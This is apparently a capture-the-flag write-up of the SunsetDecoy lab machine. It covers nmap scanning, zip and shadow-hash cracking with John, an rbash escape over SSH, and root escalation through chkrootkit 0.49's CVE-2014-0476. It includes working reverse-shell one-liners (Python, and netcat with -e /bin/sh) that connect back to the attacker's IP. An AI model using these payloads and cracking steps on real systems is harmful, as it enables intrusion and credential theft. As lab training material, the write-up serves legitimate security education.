
SunsetDecoy

Nmap
sudo nmap 192.168.184.85 -p- -sS -sV 130 
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

First up, the root page on port 80 is an index page containing a single file called save.zip.

When we try to open the downloaded archive we are prompted for a password. Kali ships John the Ripper's zip2john, which turns the archive into a hash that John can crack.

┌──(kali㉿puckie)-[~/offsec/SunsetDecoy]
└─$ zip2john save.zip > hash
ver 2.0 efh 5455 efh 7875 save.zip/etc/passwd PKZIP Encr: 2b chk, TS_chk, cmplen=668, decmplen=1807, crc=B3ACDAFE
ver 2.0 efh 5455 efh 7875 save.zip/etc/shadow PKZIP Encr: 2b chk, TS_chk, cmplen=434, decmplen=1111, crc=E11EC139
ver 2.0 efh 5455 efh 7875 save.zip/etc/group PKZIP Encr: 2b chk, TS_chk, cmplen=460, decmplen=829, crc=A1F81C08
ver 2.0 efh 5455 efh 7875 save.zip/etc/sudoers PKZIP Encr: 2b chk, TS_chk, cmplen=368, decmplen=669, crc=FF05389F
ver 2.0 efh 5455 efh 7875 save.zip/etc/hosts PKZIP Encr: 2b chk, TS_chk, cmplen=140, decmplen=185, crc=DFB905CD
ver 1.0 efh 5455 efh 7875 save.zip/etc/hostname PKZIP Encr: 2b chk, TS_chk, cmplen=45, decmplen=33, crc=D9C379A9
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.

┌──(kali㉿puckie)-[~/offsec/SunsetDecoy]
└─$ ls
hash save.zip

We can then run John against the hash.

┌──(kali㉿puckie)-[~/offsec/SunsetDecoy]
└─$ john hash --wordlist=/usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
manuel (save.zip)
1g 0:00:00:00 DONE (2021-09-09 05:12) 50.00g/s 204800p/s 204800c/s 204800C/s 123456..oooooo
Use the "--show" option to display all of the cracked passwords reliably
Session completed


Extracting save.zip with the password manuel gives us an etc/ folder containing passwd, shadow, group, sudoers, hosts and hostname.

Of these, shadow is the most interesting.

It holds password hashes for root and for the account 296640a3b825115a47b68fc44501c828. Running unshadow over passwd and shadow pairs each hash with its username so John can report which account it cracked. The root hash did not crack against the wordlist, but the other account's did:
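What unshadow actually does, plus a quick triage of the result, as an added example that is not part of the original write-up: the join it performs is reproduced with awk, and each resulting hash is mapped to its crypt(3) scheme so you can see which accounts are worth feeding to John (and which are locked). The passwd/shadow contents below are constructed sample data, not the files recovered from save.zip, and the function names are mine.

```shell
#!/bin/sh
# Added example, not from the original write-up: reproduces the unshadow join
# and classifies the hashes. passwd/shadow content is constructed sample data.

work=$(mktemp -d)
cat > "$work/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
296640a3b825115a47b68fc44501c828:x:1000:1000:,,,:/home/296640a3b825115a47b68fc44501c828:/bin/rbash
EOF
cat > "$work/shadow" <<'EOF'
root:$6$c0nstructed$NOTAREALHASH.root:18450:0:99999:7:::
daemon:*:18450:0:99999:7:::
296640a3b825115a47b68fc44501c828:$6$c0nstructed$NOTAREALHASH.user:18450:0:99999:7:::
EOF

# Same join unshadow(8) performs: replace passwd's "x" with the hash from shadow
# for matching user names, keeping the rest of the passwd record intact.
# Usage: unshadow_files <passwd> <shadow>
unshadow_files() {
    awk -F: -v OFS=: 'NR==FNR { hash[$1]=$2; next } ($1 in hash) { $2=hash[$1] } { print }' "$2" "$1"
}

# Map a crypt(3) hash to its scheme so you know which John/hashcat format applies.
# $6$ is sha512crypt, which John loads with a default of 5000 rounds.
hash_scheme() {
    case "$1" in
        '*'|'!'|'!!'|'') echo locked ;;
        '$6$'*)          echo sha512crypt ;;
        '$5$'*)          echo sha256crypt ;;
        '$1$'*)          echo md5crypt ;;
        '$y$'*)          echo yescrypt ;;
        '$2'[aby]'$'*)   echo bcrypt ;;
        *)               echo unknown ;;
    esac
}

# Print "user scheme" for every account whose hash can actually be attacked.
# Usage: crackable_accounts <passwd> <shadow>
crackable_accounts() {
    unshadow_files "$1" "$2" | while IFS=: read -r user hash _rest; do
        scheme=$(hash_scheme "$hash")
        [ "$scheme" = locked ] || echo "$user $scheme"
    done
}

crackable_accounts "$work/passwd" "$work/shadow"
```

With the constructed data this prints root and the long-named user as sha512crypt and skips daemon, whose `*` means there is nothing to crack; the unshadowed text itself is what you would redirect into unshadowed.txt for John.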

┌──(kali㉿puckie)-[~/offsec/SunsetDecoy/etc]
└─$ john unshadowed.txt --wordlist=/usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 SSE2 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:12 0.02% (ETA: 19:25:07) 0g/s 340.4p/s 680.9c/s 680.9C/s newzealand..blue13
0g 0:00:00:20 0.04% (ETA: 19:14:39) 0g/s 343.0p/s 686.0c/s 686.0C/s bethan..bagpuss
server (296640a3b825115a47b68fc44501c828)
1g 0:00:03:08 0.63% (ETA: 13:41:37) 0.005317g/s 576.4p/s 667.0c/s 667.0C/s 222520..192522
1g 0:00:03:10 0.64% (ETA: 13:40:28) 0.005257g/s 577.3p/s 666.8c/s 666.8C/s sh3lby..sabong
Use the "--show" option to display all of the cracked passwords reliably
Session aborted
We now have the password: server. It works for SSH login with that username.
┌──(kali㉿puckie)-[~/offsec/SunsetDecoy]
└─$ ssh 296640a3b825115a47b68fc44501c828@192.168.187.85 -t "bash --noprofile"

296640a3b825115a47b68fc44501c828@192.168.187.85's password: server
bash: dircolors: command not found
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ id
uid=1000(296640a3b825115a47b68fc44501c828) gid=1000(296640a3b825115a47b68fc44501c828) groups=1000(296640a3b825115a47b68fc44501c828)
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$

The account's login shell is rbash, which restricts PATH among other things, so even a simple command such as cat fails with: -rbash: cat: command not found.

Because we requested bash --noprofile through ssh -t, our session is an unrestricted bash, so we can set PATH ourselves:

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/home$ export PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games"
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/home$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/home$ cd 296640a3b825115a47b68fc44501c828/
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ cat local.txt 
5ffa884b32351d811cd1314c366c6098

That gives us a usable shell. To get a second, fully interactive session we can also throw a Python reverse shell back to our listener:

/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.184",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'

In the new shell, set PATH again so the usual commands are available:

PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin

After enumerating the machine for a while I was unable to find points of escalation. I then transferred over pspy64 and let it run.

chmod +x pspy64
./pspy64

Soon after it starts we see a flood of entries for chkrootkit-0.49.

A quick search turns up a local privilege escalation for this version and below:

Chkrootkit 0.49 - Local Privilege Escalation (CVE-2014-0476)
www.exploit-db.com

The bug is in chkrootkit's slapper() check, which runs with chkrootkit's privileges (here root): the line file_port=$file_port $i is unquoted, so when /tmp/update exists the shell executes it as a command instead of appending its name to a string. If we create /tmp/update as a reverse shell, the next scan will run it as root.
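The quoting bug in miniature, as an added example rather than chkrootkit's own code: it rebuilds the buggy assignment inside a throwaway directory created with mktemp (so nothing is written to the real /tmp/update) and contrasts it with the quoted form. The payload script only drops a marker file instead of spawning a shell, and the function names are mine.

```shell
#!/bin/sh
# Added example (not chkrootkit's source): reproduces the unquoted-assignment
# bug behind CVE-2014-0476 in a sandbox directory instead of /tmp.

# Create a directory holding an "update" script that records that it ran.
# In the real attack this file would be the reverse shell.
setup_sandbox() {
    dir=$(mktemp -d)
    printf '#!/bin/sh\ntouch "$(dirname "$0")/marker"\n' > "$dir/update"
    chmod +x "$dir/update"
    echo "$dir"
}

# Shape of the vulnerable line in chkrootkit 0.49's slapper():
#     file_port=$file_port $i
# With file_port empty the shell parses this as "run $i with file_port= in its
# environment", so the file named by $i is executed.
vulnerable_slapper() {
    file_port=
    for i in "$1/update"; do
        if [ -f "$i" ]; then
            file_port=$file_port $i
        fi
    done
}

# Quoting the assignment makes $i part of the string, nothing more.
fixed_slapper() {
    file_port=
    for i in "$1/update"; do
        if [ -f "$i" ]; then
            file_port="$file_port $i"
        fi
    done
    echo "$file_port"
}

# Runs the named function against a fresh sandbox; returns 0 if the payload ran.
payload_ran() {
    dir=$(setup_sandbox)
    "$1" "$dir" >/dev/null
    if [ -f "$dir/marker" ]; then rm -rf "$dir"; return 0; fi
    rm -rf "$dir"; return 1
}

payload_ran vulnerable_slapper && echo "unquoted assignment: payload was executed"
payload_ran fixed_slapper || echo "quoted assignment: payload only appended to the string"
```

Running it prints both lines: the unquoted form executes the file, the quoted form does not. On the target, chkrootkit is launched by root via cron, which is why the same mistake turns /tmp/update into a root shell.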

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ cat update
/usr/bin/nc 192.168.49.187 4444 -e /bin/sh

Make it executable:

chmod +x /tmp/update

Then start a netcat listener on the chosen port and wait for the root shell.

Nothing arrives until chkrootkit is actually run, and that has to be triggered from the user's home directory: honeypot.decoy there is root-owned but world-executable, and its option to launch an AV scan is what causes the root cron job shown below to run chkrootkit.

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ls -la
total 60
drwxr-xr-x 3 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4096 Sep 9 06:04 .
drwxr-xr-x 3 root root 4096 Jun 27 2020 ..
lrwxrwxrwx 1 root root 9 Jul 7 2020 .bash_history -> /dev/null
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 220 Jun 27 2020 .bash_logout
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 3583 Jun 27 2020 .bashrc
-rwxr-xr-x 1 root root 17480 Jul 7 2020 honeypot.decoy
-rw------- 1 root root 1855 Jul 7 2020 honeypot.decoy.cpp


296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy 
--------------------------------------------------

Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.

Option selected:5

The AV Scan will be launched in a minute or less.
--------------------------------------------------
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$


┌──(kali㉿puckie)-[~/offsec]
└─$ sudo nc -nlvp 4444 
listening on [any] 4444 ...
connect to [192.168.49.187] from (UNKNOWN) [192.168.187.85] 35942
id
uid=0(root) gid=0(root) groups=0(root)
ls -la
total 36
drwx------ 3 root root 4096 Sep 9 05:07 .
drwxr-xr-x 18 root root 4096 Jul 12 2020 ..
lrwxrwxrwx 1 root root 9 Jul 7 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 2 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4096 Jul 30 2009 chkrootkit-0.49
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 33 Sep 9 05:08 proof.txt
-rw-r--r-- 1 root root 32 Aug 27 2020 root.txt
-rw-r--r-- 1 root root 137 Jul 7 2020 script.sh
-rw-r--r-- 1 root root 66 Jul 7 2020 .selected_editor
cat proof.txt
80a4a1e86a9094a469a78902c269d6bb
cat script.sh
FILE=/dev/shm/STTY5246
if test -f "$FILE"; then
    /root/chkrootkit-0.49/chkrootkit
else
    echo "An AV scan will not be launched."
fi

Explained:
pwd
/var/spool/cron/crontabs
cat root
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/crontab.V4fwaR/crontab installed on Tue Jul 7 16:44:59 2020)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
# Edit this file to introduce tasks to be run by cron.
--snip--
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# 
# For more information see the manual pages of crontab(5) and cron(8)
# 
# m h dom mon dow command
* * * * * /bin/bash /root/script.sh